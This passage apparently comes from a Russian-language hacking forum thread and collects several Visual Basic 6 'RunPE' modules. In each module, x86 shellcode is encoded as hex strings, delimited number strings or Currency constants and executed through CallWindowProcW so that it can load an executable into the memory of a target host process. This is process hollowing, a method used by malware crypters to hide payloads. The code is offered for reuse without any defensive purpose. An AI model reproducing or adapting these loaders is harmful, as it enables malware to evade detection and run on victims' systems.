        s_ASM(7) = "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"
     
        For i = 0 To 7
            For j = 1 To 322 Step 2
                b_ASM(k) = CByte("&H" & Mid$(s_ASM(i), j, 2)): k = k + 1
            Next j
        Next i
     
        CallWindowProcW VarPtr(b_ASM(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
    End Sub
    Код:
    Attribute VB_Name = "MasterRunpe"
    '---------------------------------------------------------------------------
    'Coded By Assassin
    'Modul:MasterRunpe.bas
    'Hakkinda: Runpe:= exeyi callwindowproc apisi ile bellekte acma projesi ---
    'MasterRunpe Shellcode Runpe
    'alian Sistemler: Win XP,WiN ViSTA,WiN7,WiN8
    'x64 / x86 alir.
    'Date: 19 Mart 2013 - 15:30
    'Visual Basic 5 ve Visual Basic 6 da Calisir
    '---------------------------------------------------------------------------
    Private Declare Function CallWindowProcW Lib "user32" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
     
    Public Sub bellekteac(ByVal UzakYol As String, Byteveri() As Byte)
    Dim toplamveri As String
    toplamveri = toplamveri & "96HC232HC78HC0HC0HC0HC107HC0HC101HC0HC114HC0HC110HC0HC101HC0HC108HC0HC51HC0HC50HC0HC0HC0HC110HC0HC116HC0HC100HC0HC108HC0HC108HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC0HC91HC139HC252HC106HC66HC232HC187HC3HC0HC0HC139HC84HC36HC40HC137HC17HC139HC84HC36HC44HC106HC62HC232HC170HC3HC0HC0HC137HC17HC106HC74HC232HC161HC3HC0HC0HC137HC57HC106HC30HC106HC60HC232HC157HC3HC0HC0HC106HC34HC104HC244HC0HC0HC0HC232HC145HC3HC0HC0HC106HC38HC106HC36HC232HC136HC3HC0HC0HC106HC42HC106HC64HC232HC127HC3HC0HC0"
    toplamveri = toplamveri & "HC106HC46HC106HC12HC232HC118HC3HC0HC0HC106HC50HC104HC200HC0HC0HC0HC232HC106HC3HC0HC0HC106HC42HC232HC92HC3HC0HC0HC139HC9HC199HC1HC68HC0HC0HC0HC106HC18HC232HC77HC3HC0HC0HC104HC91HC232HC20HC207HC81HC232HC121HC3HC0HC0HC106HC62HC232HC59HC3HC0HC0HC139HC209HC106HC30HC232HC50HC3HC0HC0HC106HC64HC255HC50HC255HC49HC255HC208HC106HC18HC232HC35HC3HC0HC0HC104HC91HC232HC20HC207HC81HC232HC79HC3HC0HC0HC106HC30HC232HC17HC3HC0HC0HC139HC9HC139HC81HC60HC106HC62HC232HC5HC3HC0HC0HC139HC57HC3HC250HC106HC34HC232HC250HC2HC0HC0HC139HC9HC104HC248HC0HC0HC0HC87HC81HC255HC208HC106HC0HC232HC232HC2HC0HC0HC104HC136HC254HC179HC22HC81HC232HC20HC3HC0HC0HC106HC46HC232HC214HC2HC0"
    toplamveri = toplamveri & "HC0HC139HC57HC106HC42HC232HC205HC2HC0HC0HC139HC17HC106HC66HC232HC196HC2HC0HC0HC87HC82HC106HC0HC106HC0HC106HC4HC106HC0HC106HC0HC106HC0HC106HC0HC255HC49HC255HC208HC106HC18HC232HC169HC2HC0HC0HC104HC208HC55HC16HC242HC81HC232HC213HC2HC0HC0HC106HC34HC232HC151HC2HC0HC0HC139HC17HC106HC46HC232HC142HC2HC0HC0HC139HC9HC255HC114HC52HC255HC49HC255HC208HC106HC0HC232HC126HC2HC0HC0HC104HC156HC149HC26HC110HC81HC232HC170HC2HC0HC0HC106HC34HC232HC108HC2HC0HC0HC139HC17HC139HC57HC106HC46HC232HC97HC2HC0HC0HC139HC9HC106HC64HC104HC0HC48HC0HC0HC255HC114HC80HC255HC119HC52HC255HC49HC255HC208HC106HC54HC232HC71HC2HC0HC0HC139HC209HC106HC34HC232HC62HC2HC0HC0HC139HC57HC106HC62HC232HC53HC2HC0"
    toplamveri = toplamveri & "HC0HC139HC49HC106HC34HC232HC44HC2HC0HC0HC139HC1HC106HC46HC232HC35HC2HC0HC0HC139HC9HC82HC255HC119HC84HC86HC255HC112HC52HC255HC49HC106HC0HC232HC16HC2HC0HC0HC104HC161HC106HC61HC216HC81HC232HC60HC2HC0HC0HC131HC196HC12HC255HC208HC106HC18HC232HC249HC1HC0HC0HC104HC91HC232HC20HC207HC81HC232HC37HC2HC0HC0HC106HC34HC232HC231HC1HC0HC0HC139HC17HC131HC194HC6HC106HC58HC232HC219HC1HC0HC0HC106HC2HC82HC81HC255HC208HC106HC54HC232HC206HC1HC0HC0HC199HC1HC0HC0HC0HC0HC184HC40HC0HC0HC0HC106HC54HC232HC188HC1HC0HC0HC247HC33HC106HC30HC232HC179HC1HC0HC0HC139HC17HC139HC82HC60HC129HC194HC248HC0HC0HC0HC3HC208HC106HC62HC232HC159HC1HC0HC0HC3HC17HC106HC38HC232HC150HC1HC0HC0HC106"
    toplamveri = toplamveri & "HC40HC82HC255HC49HC106HC18HC232HC138HC1HC0HC0HC104HC91HC232HC20HC207HC81HC232HC182HC1HC0HC0HC131HC196HC12HC255HC208HC106HC38HC232HC115HC1HC0HC0HC139HC57HC139HC9HC139HC113HC20HC106HC62HC232HC101HC1HC0HC0HC3HC49HC106HC38HC232HC92HC1HC0HC0HC139HC9HC139HC81HC12HC106HC34HC232HC80HC1HC0HC0HC139HC9HC3HC81HC52HC106HC70HC232HC68HC1HC0HC0HC139HC193HC106HC46HC232HC59HC1HC0HC0HC139HC9HC80HC255HC119HC16HC86HC82HC255HC49HC106HC0HC232HC42HC1HC0HC0HC104HC161HC106HC61HC216HC81HC232HC86HC1HC0HC0HC131HC196HC12HC255HC208HC106HC54HC232HC19HC1HC0HC0HC139HC17HC131HC194HC1HC137HC17HC106HC58HC232HC5HC1HC0HC0HC139HC9HC59HC202HC15HC133HC51HC255HC255HC255HC106HC50HC232HC244HC0HC0HC0"
    toplamveri = toplamveri & "HC139HC9HC199HC1HC7HC0HC1HC0HC106HC0HC232HC229HC0HC0HC0HC104HC210HC199HC167HC104HC81HC232HC17HC1HC0HC0HC106HC50HC232HC211HC0HC0HC0HC139HC17HC106HC46HC232HC202HC0HC0HC0HC139HC9HC82HC255HC113HC4HC255HC208HC106HC34HC232HC187HC0HC0HC0HC139HC57HC131HC199HC52HC106HC50HC232HC175HC0HC0HC0HC139HC49HC139HC182HC164HC0HC0HC0HC131HC198HC8HC106HC46HC232HC157HC0HC0HC0HC139HC17HC106HC70HC232HC148HC0HC0HC0HC81HC106HC4HC87HC86HC255HC50HC106HC0HC232HC134HC0HC0HC0HC104HC161HC106HC61HC216HC81HC232HC178HC0HC0HC0HC131HC196HC12HC255HC208HC106HC34HC232HC111HC0HC0HC0HC139HC9HC139HC81HC40HC3HC81HC52HC106HC50HC232HC96HC0HC0HC0HC139HC9HC129HC193HC176HC0HC0HC0HC137HC17HC106HC0HC232"
    toplamveri = toplamveri & "HC79HC0HC0HC0HC104HC211HC199HC167HC232HC81HC232HC123HC0HC0HC0HC106HC50HC232HC61HC0HC0HC0HC139HC209HC106HC46HC232HC52HC0HC0HC0HC139HC9HC255HC50HC255HC113HC4HC255HC208HC106HC0HC232HC36HC0HC0HC0HC104HC136HC63HC74HC158HC81HC232HC80HC0HC0HC0HC106HC46HC232HC18HC0HC0HC0HC139HC9HC255HC113HC4HC255HC208HC106HC74HC232HC4HC0HC0HC0HC139HC33HC97HC195HC139HC203HC3HC76HC36HC4HC195HC106HC0HC232HC242HC255HC255HC255HC104HC84HC202HC175HC145HC81HC232HC30HC0HC0HC0HC106HC64HC104HC0HC16HC0HC0HC255HC116HC36HC24HC106HC0HC255HC208HC255HC116HC36HC20HC232HC207HC255HC255HC255HC137HC1HC131HC196HC16HC195HC232HC34HC0HC0HC0HC104HC164HC78HC14HC236HC80HC232HC75HC0HC0HC0HC131HC196HC8HC255HC116HC36HC4"
    toplamveri = toplamveri & "HC255HC208HC255HC116HC36HC8HC80HC232HC56HC0HC0HC0HC131HC196HC8HC195HC85HC82HC81HC83HC86HC87HC51HC192HC100HC139HC112HC48HC139HC118HC12HC139HC118HC28HC139HC110HC8HC139HC126HC32HC139HC54HC56HC71HC24HC117HC243HC128HC63HC107HC116HC7HC128HC63HC75HC116HC2HC235HC231HC139HC197HC95HC94HC91HC89HC90HC93HC195HC85HC82HC81HC83HC86HC87HC139HC108HC36HC28HC133HC237HC116HC67HC139HC69HC60HC139HC84HC40HC120HC3HC213HC139HC74HC24HC139HC90HC32HC3HC221HC227HC48HC73HC139HC52HC139HC3HC245HC51HC255HC51HC192HC252HC172HC132HC192HC116HC7HC193HC207HC13HC3HC248HC235HC244HC59HC124HC36HC32HC117HC225HC139HC90HC36HC3HC221HC102HC139HC12HC75HC139HC90HC28HC3HC221HC139HC4HC139HC3HC197HC95HC94HC91HC89HC90HC93HC195HC195HC0HC0HC0HC0"
    Dim asmbyte() As Byte
    Dim bol() As String
    bol = Split(toplamveri, "HC")
    ReDim asmbyte(UBound(bol)) As Byte
    Dim i As Long
    For i = 0 To UBound(bol)
    asmbyte(i) = CByte("&" & "H" & Hex(bol(i)))
    Next i
    CallWindowProcW VarPtr(asmbyte(0)), StrPtr(UzakYol), VarPtr(Byteveri(0)), 0, 0
    End Sub
    Код:
    ' =================================================================
    ' =================================================================
    ' => Autor: Pink
    ' => RunPE ASM en Linea
    ' => Uso RunPE(Puntero Base Ejecutable) 'Pointer PE Image
    ' => Fecha : 30|04|2013
    ' => Todos los Creditos para covetous.eyes
    ' => Requisitos: Ejecutable debe tener tabla de relocalizaciones | PE Image must have relocation table
    ' =================================================================
    ' =================================================================
     
     
    vb Código:
    Option Explicit
     
    Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
     
     
    Public Function RunPE(PE_Puntero As Long)
    Dim OP_Array() As Byte
    Dim Str_OP  As String
    Dim i As Long
     
    Str_OP = "5589E5FF7508E804000000C9C204005589E583EC3C5751508B450483E80B505B8D9BFA020000538F45F7E88F0200008945FB" & _
          "68F066246353FF75FBE8DF0200008945CC6880EFF81553FF75FBE8CE0200008945D4682207E47153FF75FBE8BD0200008945D08" & _
          "D4DCC894DE0FF7508E87100000083F8007462508F45C46A046800301000FF704C6A006AFFFF55CC8945C8FF75C8FF7508FF75C4" & _
          "FF75E0E88F000000FF75C8FF75F7FF75E0E86203000085C07427FF75C4FF75C8E8E5020000FF75C8FF7508FF75C4FF75E0E8BE0" & _
          "000008B75C48B46240345C8FFE058595F8B45E4C9C204005589E583EC0460FF75085A66813A4D5A75108B4A3C01CA813A504500" & _
          "0075038D52048955FC61FF75FC58C9C204005589E5608B55088B750C0372148B7A0C037D108B4A10FCF3A461C9C20C005589E58" & _
          "3EC14608B550C0FB742028945EC8D52148D5A608B425CBA08000000F7E201D88945F8B8280000008B55ECF7E20345F82B451089" & _
          "C18B7D148B7510F3A48B4DEC8B5DF8FF7514FF751053E890FFFFFF83C3284975EE61C9C210005589E583EC186031C08945FC8B5" & _
          "50C0FB742028945E883C2148B421C8945EC8D5A608B425CBA08000000F7E201D88945F0B8280000008B55E8F7E20345F08B5D10" & _
          "29D88945F48B55088D45F8506A02FF75F4FF7514FF520885C074218B4DE88B5DF0FF7510FF751453FF7508E81400000085C0740" & _
          "883C328E2E8FF45FC618B45FCC9C210005589E583EC0C6031DB895DF88B550C8B5A2481E3000000E081FB000000E0750AB84000" & _
          "00008945F4EB598B5A2481E30000006081FB00000060750AB8200000008945F4EB3E8B5A2481E3000000C081FB000000C0750AB" & _
          "8040000008945F4EB238B5A2481E30000004081FB00000040750AB8020000008945F4EB08B8010000008945F48B550C8B420C03" & _
          "45108B4D088D7DFC57FF75F4FF720850FF510885C07403FF45F8618B45F8C9C210005589E583EC0460648B0D300000008B790C8" & _
          "B7F1CFF77088F45FCFF77205B8B3F0FB6431885C075EC0FB60383F84B740583F86B75DF61FF75FC58C9C35589E552518B550868" & _
          "000000005951C1C907310C248A0A8D520184C975F158595AC9C204005589E583EC046068000000008F45FCFF75085E0FB70E81F" & _
          "94D5A0000755D0FB77E3C01F7813F50450000754FFF77785901F18B5918516A005AFF7120588D0406FF305F01F75057FF550C3B" & _
          "45105874108D40048D520183EB0109DB75E359EB1B5FD1E20357240FB70432C1E00201F003471C8B188D1C1E538F45FC61FF75F" & _
          "C58C9C20C005589E5608B55088B5D0C8B5B3029DA745885DB74548B450C8B989C000000035D088B430485C074418D48F8D1E98D" & _
          "7B080FB7075289C2C1E80C8B75086681E2FF0F033301D65A48750789D0C1E810EB064875080FB7C2660106EB054875020116474" & _
          "7E2CC035B04EBB861C9C208005589E583EC1C6031C0408945FC8B55108B423C8D8402800000008B0001D08945E48D7DE8B91400" & _
          "0000B000F3AA8B5DE48D75E889DFB914000000F3A6741853FF7510FF750CFF7508E81400000085C0740883C314EBDAFF45FC618" & _
          "B45FCC9C20C005589E583EC0C608B45148B400C0345108B5D0850FF530485C074638945FC8B55148B020345108945F48B421003" & _
          "45108945F831C98B45F401C88B0085C0743589C325000000807536035D108D5B0289D85153E831FEFFFF50FF750CFF75FCE84AF" & _
          "EFFFF5985C074168B5DF801CB890383C104EBC061B801000000C9C2100061B800000000C9C2100000000000"
     
     
    ReDim OP_Array((Len(Str_OP) / 2) - 1)
    For i = 1 To Len(Str_OP) - 1 Step 2
    OP_Array(Int(i / 2)) = CByte("&h" & Mid(Str_OP, i, 2))
    Next
     
    CallWindowProcW VarPtr(OP_Array(0)), PE_Puntero, 0, 0, 0
     
     
     
    End Function
    Код:
    'Author : hamavb
    'First cut : 02/03/2012 16:50
    'Credits : karcrack & cobein
    Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
    Public Function ShRunPE(ByVal TargetHost As String, bBuffer() As Byte)
    Dim Asm(160) As Currency
    Asm(0) = 3011782251321.1488@
    Asm(1) = 2842944510165.0021@
    Asm(2) = 21475170.7244@
    Asm(3) = 3039972698908.2734@
    Asm(4) = 0.0108@
    Asm(5) = 0@
    Asm(6) = 0@
    Asm(7) = 0@
    Asm(8) = 0@
    Asm(9) = 0@
    Asm(10) = 770918988510973.1328@
    Asm(11) = 609196292101137.4146@
    Asm(12) = 318076019310180.1508@
    Asm(13) = -857485367476117.5446@
    Asm(14) = 399392180.8913@
    Asm(15) = -706833318868351.5511@
    Asm(16) = 6879439133396.1731@
    Asm(17) = 763810498335316.3776@
    Asm(18) = 388654513.6166@
    Asm(19) = 98506041997.169@
    Asm(20) = 24964196938431.9488@
    Asm(21) = 22034984796.16@
    Asm(22) = 305625529718164.0704@
    Asm(23) = -410459675325501.5192@
    Asm(24) = -172419915909691.6991@
    Asm(25) = 150655457759015.8157@
    Asm(26) = 763810498295053.1535@
    Asm(27) = -334758189796557.4082@
    Asm(28) = 763810498175933.6042@
    Asm(29) = 769693235337619.0272@
    Asm(30) = 658651445508203.5218@
    Asm(31) = 93228415366.4744@
    Asm(32) = 337544363.4688@
    Asm(33) = -171181400105556.1333@
    Asm(34) = -43143787013419.7499@
    Asm(35) = -843073848963811.6758@
    Asm(36) = 586115344006226.9449@
    Asm(37) = 81903309047.8335@
    Asm(38) = -170655782147139.7888@
    Asm(39) = -296106572219468.926@
    Asm(40) = -171744351251070.9758@
    Asm(41) = 478565684273270.0365@
    Asm(42) = 766128157362243.3@
    Asm(43) = 763822153521118.6688@
    Asm(44) = -5798494293561.088@
    Asm(45) = 292876624.968@
    Asm(46) = -303308424893800.028@
    Asm(47) = 18687314406408.1922@
    Asm(48) = -814921249263117.9264@
    Asm(49) = 377936345376908.9026@
    Asm(50) = 914455950214871.0911@
    Asm(51) = 793381819255881.7282@
    Asm(52) = 247979454486563.4385@
    Asm(53) = -842580059571706.7544@
    Asm(54) = 261953043.9225@
    Asm(55) = 1351124663940.1355@
    Asm(56) = -5728895679889.4336@
    Asm(57) = 16435523184027.2177@
    Asm(58) = 453291086712582.9632@
    Asm(59) = -171181401297649.6638@
    Asm(60) = 247984901789109.5093@
    Asm(61) = 763853927511347.5304@
    Asm(62) = 68764336814004.0238@
    Asm(63) = 377880083361326.677@
    Asm(64) = 58153857883.8015@
    Asm(65) = -170634502550313.984@
    Asm(66) = -6846382739763.962@
    Asm(67) = 217285200.5584@
    Asm(68) = 273152312385105.8024@
    Asm(69) = 13733354816300.6466@
    Asm(70) = 764000768607145.1648@
    Asm(71) = 17395153563837.4458@
    Asm(72) = -353751767489869.7902@
    Asm(73) = 763363.3281@
    Asm(74) = 392094642558210.6624@
    Asm(75) = 764766522162398.7432@
    Asm(76) = 126410412043612.3678@
    Asm(77) = 27351427555.8027@
    Asm(78) = 11706747011255.5776@
    Asm(79) = -757276053642969.088@
    Asm(80) = 360268856045024.0513@
    Asm(81) = 749398978656993.7514@
    Asm(82) = 12354147786351.6251@
    Asm(83) = 769693219347778.7648@
    Asm(84) = 414640788194904.6822@
    Asm(85) = -171181417231738.2261@
    Asm(86) = 276807880992725.4373@
    Asm(87) = -842805239553082.2424@
    Asm(88) = 37043291672.0721@
    Asm(89) = 507392545273423.744@
    Asm(90) = 769258247064186.1864@
    Asm(91) = 68764336812483.5886@
    Asm(92) = 360268875651665.0832@
    Asm(93) = 749398978495932.017@
    Asm(94) = 9651988025294.3009@
    Asm(95) = 769693219347778.7648@
    Asm(96) = 126410412042563.7942@
    Asm(97) = -171294008471547.0205@
    Asm(98) = -387449256181707.5451@
    Asm(99) = 363299752439103.6175@
    Asm(100) = -410459675325517.2888@
    Asm(101) = -172926570866094.7199@
    Asm(102) = -635688100489173.3787@
    Asm(103) = 763810497261576.6376@
    Asm(104) = 126410412042144.3634@
    Asm(105) = -843073849903335.4646@
    Asm(106) = 769693215773368.7817@
    Asm(107) = 414640788193698.8194@
    Asm(108) = 4951342415221.7475@
    Asm(109) = 4636260512845.0048@
    Asm(110) = -171631782205882.368@
    Asm(111) = 507388721888441.1549@
    Asm(112) = 31815578412492.9256@
    Asm(113) = -872572382190820.8041@
    Asm(114) = -286501654647065.8048@
    Asm(115) = -428658242031485.5343@
    Asm(116) = 3149895693349.6588@
    Asm(117) = 22752143878461.8496@
    Asm(118) = 10655039450.0177@
    Asm(119) = 19434514006.2976@
    Asm(120) = 2249161163731.9936@
    Asm(121) = 590215178835617.3824@
    Asm(122) = -171519195984216.1688@
    Asm(123) = 334471606820667.3981@
    Asm(124) = -6937148713125.7624@
    Asm(125) = 3006614124114.7186@
    Asm(126) = 457802337043140.7336@
    Asm(127) = 34749504.673@
    Asm(128) = -843073850212036.239@
    Asm(129) = 536232810004781.4409@
    Asm(130) = 699902812802672.356@
    Asm(131) = -439434742750697.5805@
    Asm(132) = 756604737376275.6714@
    Asm(133) = 869968633553.1604@
    Asm(134) = 450404738465.792@
    Asm(135) = -7194094211452.1344@
    Asm(136) = -1353710065018.4752@
    Asm(137) = -439079356974065.2545@
    Asm(138) = 566676858034822.4232@
    Asm(139) = 32602016.4622@
    Asm(140) = -7089160921751.4365@
    Asm(141) = 410061545662244.4496@
    Asm(142) = 617979275378688@
    Asm(143) = 725985904952471.1762@
    Asm(144) = 854193482151915.9435@
    Asm(145) = -842159216757581.13@
    Asm(146) = 457592490565246.7766@
    Asm(147) = 17684902147728.7019@
    Asm(148) = 643884385768544.0491@
    Asm(149) = 622040492439682.185@
    Asm(150) = 842553683379673.7879@
    Asm(151) = 865826324060815.6483@
    Asm(152) = 233132869356380.6979@
    Asm(153) = -841594865717950.1309@
    Asm(154) = -598169487549740.1085@
    Asm(155) = 22006038477175.2068@
    Asm(156) = 843978581769276.108@
    Asm(157) = -840178504924852.7391@
    Asm(158) = -836852911227146.7764@
    Asm(159) = 643884385767650.3812@
    Asm(160) = 328436.0538@
    CallWindowProc VarPtr(Asm(0)), StrPtr(TargetHost), VarPtr(bBuffer(0)), 0, 0
    End Function
    --- добавлено: 23 дек 2013 в 14:16 ---
     
    • Like Like x 4
    Метки:

Поделиться этой страницей

Загрузка...